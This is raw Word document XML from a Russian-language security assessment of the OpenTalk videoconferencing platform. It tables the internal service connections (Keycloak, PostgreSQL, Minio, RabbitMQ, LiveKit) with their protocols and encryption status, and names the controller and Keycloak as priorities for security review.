              <w:t>Доступ через прокси к контейнерам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E7C00" w14:textId="7F9FBE6F" w:rsidR="005927B6" w:rsidRPr="00D85D3B" w:rsidRDefault="00D85D3B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Шифрования нет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7E670" w14:textId="18ED93B9" w:rsidR="005927B6" w:rsidRPr="00D85D3B" w:rsidRDefault="00D85D3B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Внутренний трафик системы незащищен. Риск раскрытия внутренней сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3626" w14:paraId="5C873251" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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0CCF" w14:textId="526913E4" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>3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7C11" w14:textId="20CBD610" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OIDC)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431F0230" w14:textId="63D1668D" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E6AC4DC" w14:textId="17A3D6F6" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="037A67F3" w14:textId="43D66B2A" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">– </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">» </w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(HTTPS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="753C326B" w14:textId="09F27AD2" w:rsidR="00FB3626" w:rsidRPr="00D85D3B" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US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72F2E" w14:textId="5A61962E" w:rsidR="00FB3626" w:rsidRPr="00D85D3B" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Валидация </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="00D85D3B">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>токенов</w:t>
            </w:r>
            <w:r w:rsidRPr="00D85D3B">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>JWT</w:t>
            </w:r>
            <w:r>
              <w:t>), аутентификация пользователя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9B861" w14:textId="65BCB059" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626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TLS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0B59" w14:textId="0CAD11EF" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Controller</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3626">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">обращается к </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB3626">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>для аутентификация</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3626" w:rsidRPr="00FB3626" w14:paraId="1BA919A0" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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ABDD0" w14:textId="242CEF91" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>4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6CD99" w14:textId="2E96DC59" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00495F80">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller – </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626" w:rsidRPr="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ostgreSQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C78BC03" w14:textId="063A43B9" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63A57706" w14:textId="77777777" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BCF10DC" w14:textId="1A7312D8" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00495F80">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626" w:rsidRPr="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626" w:rsidRPr="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ostgreSQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40FEA92A" w14:textId="31C6A6A2" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21C09F31" w14:textId="56951D92" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US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F157" w14:textId="38184C88" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB3626">
              <w:t>Хранение данных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8EF1" w14:textId="7AFCD27C" w:rsidR="00FB3626" w:rsidRPr="008D0061" w:rsidRDefault="008D0061" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Шифрования нет</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TCP)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8299" w14:textId="0854DA9D" w:rsidR="00FB3626" w:rsidRPr="008D0061" w:rsidRDefault="008D0061" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D0061">
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008D0061">
              <w:t xml:space="preserve"> прослушивает только</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> локальную сеть, </w:t>
            </w:r>
            <w:r w:rsidRPr="008D0061">
              <w:t>доступ возможен исключительно с хоста сервера</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3626" w14:paraId="5992E37E" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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D449" w14:textId="6AEF4A11" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>5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03CB" w14:textId="2CCE0409" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller – </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>inio</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (S3/HTTP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2204C119" w14:textId="37795638" w:rsidR="00FB3626" w:rsidRPr="001211A6" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US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A7FC" w14:textId="4DAF3CDF" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB3626">
              <w:t>Хранение записей и файлов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4877" w14:textId="57466F94" w:rsidR="00FB3626" w:rsidRDefault="008D0061" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Шифрования нет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AF81" w14:textId="3FD7FA06" w:rsidR="00FB3626" w:rsidRPr="005927B6" w:rsidRDefault="008D0061" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="008D0061">
              <w:t>S3-протокол используется без TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3626" w14:paraId="67BE9477" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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BF39" w14:textId="606FA7DE" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626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CBCE" w14:textId="0E244923" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00495F80">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller – </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Rabbit</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MQ</w:t>
            </w:r>
            <w:r w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AMQP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="176D37E3" w14:textId="71D188E8" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D74CE24" w14:textId="77777777" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US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50C27" w14:textId="2FEA0A5F" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB3626">
              <w:t>Очереди задач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FC2C" w14:textId="0620E661" w:rsidR="00FB3626" w:rsidRDefault="008D0061" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0061">
              <w:t>Шифрования нет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132D" w14:textId="779970F1" w:rsidR="00FB3626" w:rsidRPr="005508D7" w:rsidRDefault="00763E44" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Rabbit</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:t>MQ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005508D7" w:rsidRPr="005508D7">
              <w:t xml:space="preserve"> прослушивает только </w:t>
            </w:r>
            <w:r w:rsidR="005508D7">
              <w:t xml:space="preserve">локальную сеть </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3626" w:rsidRPr="00F0569E" w14:paraId="75E15465" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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E2B5" w14:textId="3687CF2F" w:rsidR="00FB3626" w:rsidRPr="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00FB3626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27CD" w14:textId="7C7A976F" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r w:rsidR="00F0569E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (HTTPS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446AAD04" w14:textId="77777777" w:rsidR="00F0569E" w:rsidRPr="001211A6" w:rsidRDefault="00F0569E" w:rsidP="00F0569E">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A66D21D" w14:textId="42DA4823" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00F0569E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="00F0569E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72" w:rsidRPr="00F0569E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DTLS-SRTP</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4902A9" w14:textId="7597757A" w:rsidR="00FB3626" w:rsidRDefault="00FB3626" w:rsidP="00F0569E">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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DD1E" w14:textId="71001554" w:rsidR="00FB3626" w:rsidRPr="00F0569E" w:rsidRDefault="00F0569E" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0569E">
              <w:t xml:space="preserve">Передача </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F0569E">
              <w:t>медиапотока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AABED" w14:textId="56331A36" w:rsidR="00FB3626" w:rsidRPr="005508D7" w:rsidRDefault="005508D7" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005508D7">
              <w:t>TLS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="005508D7">
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005508D7">
              <w:t>DTLS-SRTP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8FBF" w14:textId="67A24A0C" w:rsidR="00FB3626" w:rsidRPr="005508D7" w:rsidRDefault="005508D7" w:rsidP="00FB3626">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="005508D7">
              <w:t>Сигнальный трафик защищён TLS, аудио/видео шифруются на уровне протокола DTLS-SRTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73284FF8" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRPr="005508D7" w:rsidRDefault="00EC7AA4" w:rsidP="00EC7AA4">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769127CE" w14:textId="7B230C86" w:rsidR="00F0569E" w:rsidRDefault="003A5828" w:rsidP="00EC7AA4">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B22D3" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve">реализует видеоконференцсвязь через </w:t>
      </w:r>
      <w:r w:rsidR="00F0569E">
        <w:t>набор сервисов точкой входа в виде</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0569E">
        <w:t xml:space="preserve">прокси-сервера </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:snapToGrid/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve">Основной поток работы: аутентификация пользователя в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F04CB">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F0569E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve"> получение токена</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve"> обращение к контроллеру</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve"> выдача доступа к медиасерверу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:t>LiveKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F0569E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t xml:space="preserve"> прямое медиа</w:t>
      </w:r>
      <w:r w:rsidR="001211A6">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F0569E" w:rsidRPr="00F0569E">
        <w:t>соединение браузер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1473B6" w14:textId="44B91939" w:rsidR="00F0569E" w:rsidRPr="00A75A45" w:rsidRDefault="00F0569E" w:rsidP="00EC7AA4">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Наиболее приоритетным для исследования безопасности можно выделить </w:t>
      </w:r>
      <w:r w:rsidR="001211A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ontroller</w:t>
      </w:r>
      <w:r w:rsidR="00495F80" w:rsidRPr="00495F80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F0569E">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Модерация и управление контейнерами), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F04CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
